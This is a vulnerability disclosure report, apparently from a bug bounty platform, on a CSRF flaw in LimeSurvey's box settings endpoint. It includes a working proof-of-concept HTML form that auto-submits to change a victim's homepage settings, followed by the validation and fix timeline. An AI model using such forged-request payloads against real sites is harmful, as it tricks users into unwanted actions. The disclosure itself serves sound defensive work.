CSRF in Save Box Settings in limesurvey/limesurvey

Valid

Reported on

Oct 2nd 2023


Description

CSRF in Save Box Settings

Proof of Concept

1 .Attacker send form fake to user

<html>
  <body>
    <form action="https://haido456.limesurvey.net/homepageSettings/updateBoxesSettings/boxesbyrow/10/boxesoffset/2">
      <input type="submit" value="Submit request" />
    </form>
   <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

2 .User click, interface home changed

Video Poc

https://drive.google.com/file/d/18y9P7SZuHgNC3uzmD50Xo82Yrmp5V4VS/view?usp=sharing

Impact

Trick users into taking unwanted actions.

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago
HaiNguyen modified the report
5 months ago
tiborpacalat
5 months ago

Maintainer


Internal tracking number: 19142

We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago
HaiNguyen
4 months ago

Researcher


@tiborpacalat, hi, any new update ?

tiborpacalat validated this vulnerability 4 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.3.0+231016 with commit ffb66e 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago
to join this conversation